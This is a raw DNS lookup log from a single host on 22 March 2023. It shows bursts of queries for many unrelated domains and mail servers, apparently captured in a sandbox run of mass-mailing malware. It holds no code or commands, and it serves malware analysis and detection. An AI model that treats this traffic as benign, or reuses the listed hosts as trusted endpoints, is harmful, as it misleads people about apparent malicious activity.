Mar 22, 2023 05:44:01.316364050 CET	192.168.2.5	8.8.8.8	0xd23a	Standard query (0)	www.ftchat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:01.333331108 CET	192.168.2.5	8.8.8.8	0xed64	Standard query (0)	www.wkhk.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:01.947630882 CET	192.168.2.5	8.8.8.8	0x1296	Standard query (0)	www.jroy.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:01.988301039 CET	192.168.2.5	8.8.8.8	0x562	Standard query (0)	www.com-sit.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:02.126595020 CET	192.168.2.5	8.8.8.8	0xb8d6	Standard query (0)	www.vexcom.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:02.317646027 CET	192.168.2.5	8.8.8.8	0xa326	Standard query (0)	www.sjbs.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:02.786798954 CET	192.168.2.5	8.8.8.8	0xe62c	Standard query (0)	www.yocinc.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:02.831291914 CET	192.168.2.5	8.8.8.8	0x9c57	Standard query (0)	www.reglera.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:03.030756950 CET	192.168.2.5	8.8.8.8	0x8180	Standard query (0)	www.owsports.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:03.397247076 CET	192.168.2.5	8.8.8.8	0x28	Standard query (0)	www.maktraxx.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:03.751813889 CET	192.168.2.5	8.8.8.8	0x448e	Standard query (0)	www.vitaindu.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:04.096393108 CET	192.168.2.5	8.8.8.8	0x9f6b	Standard query (0)	www.jroy.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:04.105007887 CET	192.168.2.5	8.8.8.8	0x7de2	Standard query (0)	www.cel-cpa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:04.324877977 CET	192.168.2.5	8.8.8.8	0x9189	Standard query (0)	www.valselit.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:04.864706039 CET	192.168.2.5	8.8.8.8	0x9029	Standard query (0)	www.2print.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:05.268438101 CET	192.168.2.5	8.8.8.8	0x5f07	Standard query (0)	www.fe-bauer.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:05.456338882 CET	192.168.2.5	8.8.8.8	0x9660	Standard query (0)	www.x0c.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:05.518836021 CET	192.168.2.5	8.8.8.8	0x7c74	Standard query (0)	www.udesign.biz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:05.697279930 CET	192.168.2.5	8.8.8.8	0xff94	Standard query (0)	www.koz1.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:06.315227985 CET	192.168.2.5	8.8.8.8	0xd92e	Standard query (0)	www.yumgiskor.kz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:06.899017096 CET	192.168.2.5	8.8.8.8	0x91c5	Standard query (0)	www.medisa.info	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:08.142960072 CET	192.168.2.5	8.8.8.8	0x1f75	Standard query (0)	www.usadig.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:09.026040077 CET	192.168.2.5	8.8.8.8	0xff3d	Standard query (0)	www.ex-olive.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:09.314338923 CET	192.168.2.5	8.8.8.8	0x8198	Standard query (0)	www.ottospm.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:09.338378906 CET	192.168.2.5	8.8.8.8	0xea3a	Standard query (0)	www.koz1.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:09.338578939 CET	192.168.2.5	8.8.8.8	0xd9b7	Standard query (0)	www.tyrns.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:10.038831949 CET	192.168.2.5	8.8.8.8	0xfad1	Standard query (0)	www.spanesi.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:10.253218889 CET	192.168.2.5	8.8.8.8	0xbcf9	Standard query (0)	www.tc17.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:10.738302946 CET	192.168.2.5	8.8.8.8	0xe705	Standard query (0)	www.wnsavoy.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:10.929976940 CET	192.168.2.5	8.8.8.8	0x1ed1	Standard query (0)	www.railbook.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:11.406109095 CET	192.168.2.5	8.8.8.8	0x8fc8	Standard query (0)	www.fnsds.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:12.026289940 CET	192.168.2.5	8.8.8.8	0x7930	Standard query (0)	www.pohlfood.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:13.322987080 CET	192.168.2.5	8.8.8.8	0xd6a8	Standard query (0)	gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:13.648462057 CET	192.168.2.5	8.8.8.8	0x415b	Standard query (0)	www.11tochi.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:16.259767056 CET	192.168.2.5	8.8.8.8	0x1ee2	Standard query (0)	www.pb-games.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:16.766539097 CET	192.168.2.5	8.8.8.8	0x45f2	Standard query (0)	gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:17.351532936 CET	192.168.2.5	8.8.8.8	0xad03	Standard query (0)	www.sclover3.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:18.484534979 CET	192.168.2.5	8.8.8.8	0x5c33	Standard query (0)	smtp.sbcglobal.yahoo.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:19.317635059 CET	192.168.2.5	8.8.8.8	0x4e2b	Standard query (0)	www.fnw.us	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:19.322940111 CET	192.168.2.5	8.8.8.8	0x75d6	Standard query (0)	www.ftchat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:19.324002028 CET	192.168.2.5	8.8.8.8	0xce10	Standard query (0)	www.wkhk.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:20.802573919 CET	192.168.2.5	8.8.8.8	0x52aa	Standard query (0)	www.owsports.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:21.583453894 CET	192.168.2.5	8.8.8.8	0xf62d	Standard query (0)	gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:21.740242004 CET	192.168.2.5	8.8.8.8	0xa268	Standard query (0)	www.jroy.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:21.861201048 CET	192.168.2.5	8.8.8.8	0x9e65	Standard query (0)	mail.protonmail.ch	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:22.474478960 CET	192.168.2.5	8.8.8.8	0x9b9e	Standard query (0)	www.synetik.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:24.228606939 CET	192.168.2.5	8.8.8.8	0xef1	Standard query (0)	www.fnsds.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:24.562474012 CET	192.168.2.5	8.8.8.8	0xf5e	Standard query (0)	www.udesign.biz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:24.654156923 CET	192.168.2.5	8.8.8.8	0xf942	Standard query (0)	awal.ws	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:24.670448065 CET	192.168.2.5	8.8.8.8	0x9940	Standard query (0)	k-nikko.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:24.679327011 CET	192.168.2.5	8.8.8.8	0x31a8	Standard query (0)	akdeniz.nl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:24.684096098 CET	192.168.2.5	8.8.8.8	0xe1da	Standard query (0)	wantapc.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:24.690551996 CET	192.168.2.5	8.8.8.8	0x8f96	Standard query (0)	shenhgts.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:24.696434975 CET	192.168.2.5	8.8.8.8	0x9f95	Standard query (0)	msl-lock.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:24.710773945 CET	192.168.2.5	8.8.8.8	0x338b	Standard query (0)	redgiga.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.100509882 CET	192.168.2.5	8.8.8.8	0xe80	Standard query (0)	themark.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.115535021 CET	192.168.2.5	8.8.8.8	0x3820	Standard query (0)	cpwpb.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.118273020 CET	192.168.2.5	8.8.8.8	0x567a	Standard query (0)	stopllc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.120727062 CET	192.168.2.5	8.8.8.8	0xd043	Standard query (0)	karila.fr	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.121457100 CET	192.168.2.5	8.8.8.8	0x5d41	Standard query (0)	hchc.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.127746105 CET	192.168.2.5	8.8.8.8	0x23e9	Standard query (0)	usadig.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.128643990 CET	192.168.2.5	8.8.8.8	0x461d	Standard query (0)	okashimo.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.162451982 CET	192.168.2.5	8.8.8.8	0xe6e5	Standard query (0)	mxs.mail.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.167146921 CET	192.168.2.5	8.8.8.8	0x79dd	Standard query (0)	cpwpb.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.167651892 CET	192.168.2.5	8.8.8.8	0xcba3	Standard query (0)	diamir.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.193150997 CET	192.168.2.5	8.8.8.8	0xc63b	Standard query (0)	alt4.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.204497099 CET	192.168.2.5	8.8.8.8	0x7d02	Standard query (0)	cpwpb.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.229345083 CET	192.168.2.5	8.8.8.8	0xee96	Standard query (0)	gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.253904104 CET	192.168.2.5	8.8.8.8	0x34f	Standard query (0)	vvsteknik.dk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.256012917 CET	192.168.2.5	8.8.8.8	0x6aea	Standard query (0)	muhr-soehne.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.308016062 CET	192.168.2.5	8.8.8.8	0xe002	Standard query (0)	in1.smtp.messagingengine.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.428971052 CET	192.168.2.5	8.8.8.8	0x8788	Standard query (0)	mail7.digitalwaves.co.nz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.432364941 CET	192.168.2.5	8.8.8.8	0xe18e	Standard query (0)	cjcagent.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.432498932 CET	192.168.2.5	8.8.8.8	0x6775	Standard query (0)	at-shun.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.432498932 CET	192.168.2.5	8.8.8.8	0xbb4b	Standard query (0)	ntc.edu.au	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.432754040 CET	192.168.2.5	8.8.8.8	0x90ca	Standard query (0)	nme.co.jp	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.443907022 CET	192.168.2.5	8.8.8.8	0x52f6	Standard query (0)	hamaker.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.464662075 CET	192.168.2.5	8.8.8.8	0x2e72	Standard query (0)	revoldia.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.503911018 CET	192.168.2.5	8.8.8.8	0x4cd5	Standard query (0)	strazynski.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.571579933 CET	192.168.2.5	8.8.8.8	0xf89a	Standard query (0)	touchfam.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.571579933 CET	192.168.2.5	8.8.8.8	0x67a1	Standard query (0)	www.muhr-soehne.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.660609007 CET	192.168.2.5	8.8.8.8	0x24a9	Standard query (0)	top1oil.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.695986986 CET	192.168.2.5	8.8.8.8	0x54fb	Standard query (0)	dhh.la.gov	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.758632898 CET	192.168.2.5	8.8.8.8	0xf5e	Standard query (0)	www.udesign.biz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.778017044 CET	192.168.2.5	8.8.8.8	0x31e4	Standard query (0)	webavant.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.794038057 CET	192.168.2.5	8.8.8.8	0x30aa	Standard query (0)	orlyhotel.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.849045992 CET	192.168.2.5	8.8.8.8	0x5ec0	Standard query (0)	samtv.ro	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.851829052 CET	192.168.2.5	8.8.8.8	0x9a9c	Standard query (0)	yhsll.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.870399952 CET	192.168.2.5	8.8.8.8	0x6b38	Standard query (0)	cpmteam.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.886722088 CET	192.168.2.5	8.8.8.8	0xade8	Standard query (0)	www.reglera.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.896413088 CET	192.168.2.5	8.8.8.8	0x5b28	Standard query (0)	www.synetik.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.943161964 CET	192.168.2.5	8.8.8.8	0x7dec	Standard query (0)	sinwal.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.964514971 CET	192.168.2.5	8.8.8.8	0x4538	Standard query (0)	www.pohlfood.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.982637882 CET	192.168.2.5	8.8.8.8	0xa532	Standard query (0)	ifesnet.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.009859085 CET	192.168.2.5	8.8.8.8	0xb668	Standard query (0)	sigtoa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.016468048 CET	192.168.2.5	8.8.8.8	0xbd64	Standard query (0)	www.diamir.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.020674944 CET	192.168.2.5	8.8.8.8	0xe878	Standard query (0)	kursavto.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.030675888 CET	192.168.2.5	8.8.8.8	0x7cd9	Standard query (0)	eos-i.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.030778885 CET	192.168.2.5	8.8.8.8	0xd641	Standard query (0)	rokoron.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.038496017 CET	192.168.2.5	8.8.8.8	0xb8e6	Standard query (0)	shanks.co.uk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.038973093 CET	192.168.2.5	8.8.8.8	0xc17a	Standard query (0)	bggs.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.043186903 CET	192.168.2.5	8.8.8.8	0x660e	Standard query (0)	insia.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.076596022 CET	192.168.2.5	8.8.8.8	0x25ce	Standard query (0)	samtv.ro	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.165885925 CET	192.168.2.5	8.8.8.8	0xba3a	Standard query (0)	samtv.ro	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.184207916 CET	192.168.2.5	8.8.8.8	0x43cd	Standard query (0)	nlcv.bas.bg	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.347855091 CET	192.168.2.5	8.8.8.8	0xfe45	Standard query (0)	ludea.cz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.349728107 CET	192.168.2.5	8.8.8.8	0x9de1	Standard query (0)	k-nikko.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.454992056 CET	192.168.2.5	8.8.8.8	0x35bb	Standard query (0)	gcss.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.534113884 CET	192.168.2.5	8.8.8.8	0x7d79	Standard query (0)	ludea.cz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.569699049 CET	192.168.2.5	8.8.8.8	0xd1f	Standard query (0)	mxs.mail.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.569736958 CET	192.168.2.5	8.8.8.8	0xe1c9	Standard query (0)	scintel.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.569818974 CET	192.168.2.5	8.8.8.8	0xf19d	Standard query (0)	esmoke.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.571717978 CET	192.168.2.5	8.8.8.8	0x6e4d	Standard query (0)	workplus.hu	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.574026108 CET	192.168.2.5	8.8.8.8	0x2ae5	Standard query (0)	avse.hu	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.576797009 CET	192.168.2.5	8.8.8.8	0x1280	Standard query (0)	actmin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.579488039 CET	192.168.2.5	8.8.8.8	0xb7d0	Standard query (0)	shittas.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.594342947 CET	192.168.2.5	8.8.8.8	0x73df	Standard query (0)	polprime.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.603296995 CET	192.168.2.5	8.8.8.8	0xcca3	Standard query (0)	ciicsc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.610460043 CET	192.168.2.5	8.8.8.8	0x1c9	Standard query (0)	hes.pt	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.621753931 CET	192.168.2.5	8.8.8.8	0x71d2	Standard query (0)	gydrozo.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.628957033 CET	192.168.2.5	8.8.8.8	0x9bd3	Standard query (0)	alt4.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.637224913 CET	192.168.2.5	8.8.8.8	0x852c	Standard query (0)	ludea.cz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.639136076 CET	192.168.2.5	8.8.8.8	0x5a63	Standard query (0)	ftmobile.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.645826101 CET	192.168.2.5	8.8.8.8	0xeeca	Standard query (0)	cvswl.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.657675982 CET	192.168.2.5	8.8.8.8	0x46a5	Standard query (0)	gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.684474945 CET	192.168.2.5	8.8.8.8	0x4912	Standard query (0)	smtp.compuserve.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.746413946 CET	192.168.2.5	8.8.8.8	0xd072	Standard query (0)	in1.smtp.messagingengine.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.823275089 CET	192.168.2.5	8.8.8.8	0x59d0	Standard query (0)	mail7.digitalwaves.co.nz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.865946054 CET	192.168.2.5	8.8.8.8	0xec84	Standard query (0)	atis-sk.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.869683981 CET	192.168.2.5	8.8.8.8	0x5aa3	Standard query (0)	dspears.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.900058985 CET	192.168.2.5	8.8.8.8	0xbbef	Standard query (0)	riwn.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.926980019 CET	192.168.2.5	8.8.8.8	0x67db	Standard query (0)	cutchie.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.953072071 CET	192.168.2.5	8.8.8.8	0xa1be	Standard query (0)	smtp.live.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.996619940 CET	192.168.2.5	8.8.8.8	0xd5f6	Standard query (0)	hes.pt	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.996701956 CET	192.168.2.5	8.8.8.8	0xefe5	Standard query (0)	kayoaiba.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.996870995 CET	192.168.2.5	8.8.8.8	0x3622	Standard query (0)	hamaker.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.997039080 CET	192.168.2.5	8.8.8.8	0xd49b	Standard query (0)	nekono.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.998095036 CET	192.168.2.5	8.8.8.8	0x81d0	Standard query (0)	awal.ws	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.998095036 CET	192.168.2.5	8.8.8.8	0xc023	Standard query (0)	at-shun.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.998799086 CET	192.168.2.5	8.8.8.8	0x2952	Standard query (0)	cbaben.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.008368015 CET	192.168.2.5	8.8.8.8	0xf847	Standard query (0)	atis-sk.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.012525082 CET	192.168.2.5	8.8.8.8	0xb091	Standard query (0)	grlawcc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.012940884 CET	192.168.2.5	8.8.8.8	0xc30a	Standard query (0)	isom.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.027334929 CET	192.168.2.5	8.8.8.8	0x3d3a	Standard query (0)	tabbles.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.042246103 CET	192.168.2.5	8.8.8.8	0xd74c	Standard query (0)	grlawcc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.081957102 CET	192.168.2.5	8.8.8.8	0xac7a	Standard query (0)	atis-sk.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.169270992 CET	192.168.2.5	8.8.8.8	0xda12	Standard query (0)	cbras.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.306443930 CET	192.168.2.5	8.8.8.8	0x60ce	Standard query (0)	daytonir.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.308170080 CET	192.168.2.5	8.8.8.8	0xc96a	Standard query (0)	skypearl.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.308492899 CET	192.168.2.5	8.8.8.8	0xaa30	Standard query (0)	grlawcc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.319489002 CET	192.168.2.5	8.8.8.8	0x449f	Standard query (0)	dbnet.at	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.332623005 CET	192.168.2.5	8.8.8.8	0x7f31	Standard query (0)	envogen.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.350239038 CET	192.168.2.5	8.8.8.8	0xbc6a	Standard query (0)	jabian.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.360856056 CET	192.168.2.5	8.8.8.8	0xab00	Standard query (0)	snf.it	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.415102005 CET	192.168.2.5	8.8.8.8	0x77ae	Standard query (0)	ldh.la.gov	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.415640116 CET	192.168.2.5	8.8.8.8	0x8f5c	Standard query (0)	semuk.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.415640116 CET	192.168.2.5	8.8.8.8	0x1460	Standard query (0)	nts-web.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.511101007 CET	192.168.2.5	8.8.8.8	0xc8d4	Standard query (0)	absblast.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.528342962 CET	192.168.2.5	8.8.8.8	0xb201	Standard query (0)	themark.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.532262087 CET	192.168.2.5	8.8.8.8	0x634c	Standard query (0)	averwin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.618956089 CET	192.168.2.5	8.8.8.8	0xe16d	Standard query (0)	semuk.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.619278908 CET	192.168.2.5	8.8.8.8	0x1280	Standard query (0)	actmin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.671891928 CET	192.168.2.5	8.8.8.8	0x77bd	Standard query (0)	apcotex.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.686759949 CET	192.168.2.5	8.8.8.8	0xb8e4	Standard query (0)	rkengg.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.688494921 CET	192.168.2.5	8.8.8.8	0x83b3	Standard query (0)	webband.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.712544918 CET	192.168.2.5	8.8.8.8	0xa194	Standard query (0)	metaforacom.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.712734938 CET	192.168.2.5	8.8.8.8	0x2333	Standard query (0)	tozzhin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.750746012 CET	192.168.2.5	8.8.8.8	0x7800	Standard query (0)	onzcda.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.784239054 CET	192.168.2.5	8.8.8.8	0x7fca	Standard query (0)	wahw.com.au	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.784404993 CET	192.168.2.5	8.8.8.8	0x41c5	Standard query (0)	nolaoig.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.791985989 CET	192.168.2.5	8.8.8.8	0x965d	Standard query (0)	mxs.mail.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.825244904 CET	192.168.2.5	8.8.8.8	0x7713	Standard query (0)	tcpoa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.827383041 CET	192.168.2.5	8.8.8.8	0xde0f	Standard query (0)	peminet.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.827861071 CET	192.168.2.5	8.8.8.8	0xabb3	Standard query (0)	roewer.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.828897953 CET	192.168.2.5	8.8.8.8	0x125e	Standard query (0)	wanoa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.843905926 CET	192.168.2.5	8.8.8.8	0x42af	Standard query (0)	alt4.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.848177910 CET	192.168.2.5	8.8.8.8	0xacc5	Standard query (0)	averwin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.884073019 CET	192.168.2.5	8.8.8.8	0xbd17	Standard query (0)	gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.886192083 CET	192.168.2.5	8.8.8.8	0x55c	Standard query (0)	mackusick.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.947108984 CET	192.168.2.5	8.8.8.8	0x54f5	Standard query (0)	in1.smtp.messagingengine.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.981163979 CET	192.168.2.5	8.8.8.8	0xb9df	Standard query (0)	nblewis.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.997168064 CET	192.168.2.5	8.8.8.8	0xbc27	Standard query (0)	eos-i.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.056914091 CET	192.168.2.5	8.8.8.8	0x2a37	Standard query (0)	mail7.digitalwaves.co.nz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.082104921 CET	192.168.2.5	8.8.8.8	0xfd95	Standard query (0)	www.medisa.info	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.094652891 CET	192.168.2.5	8.8.8.8	0xb476	Standard query (0)	bossinst.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.097398996 CET	192.168.2.5	192.5.5.241	0x96	Standard query (0)	com	NS (Name server)	IN (0x0001)	false
Mar 22, 2023 05:44:28.120229006 CET	192.168.2.5	192.33.4.12	0xc0	Standard query (0)	org	NS (Name server)	IN (0x0001)	false
Mar 22, 2023 05:44:28.147981882 CET	192.168.2.5	198.41.0.4	0xff	Standard query (0)	de	NS (Name server)	IN (0x0001)	false
Mar 22, 2023 05:44:28.155354023 CET	192.168.2.5	8.8.8.8	0x61d9	Standard query (0)	eos-i.com	A (IP address)	IN (0x0001)	false
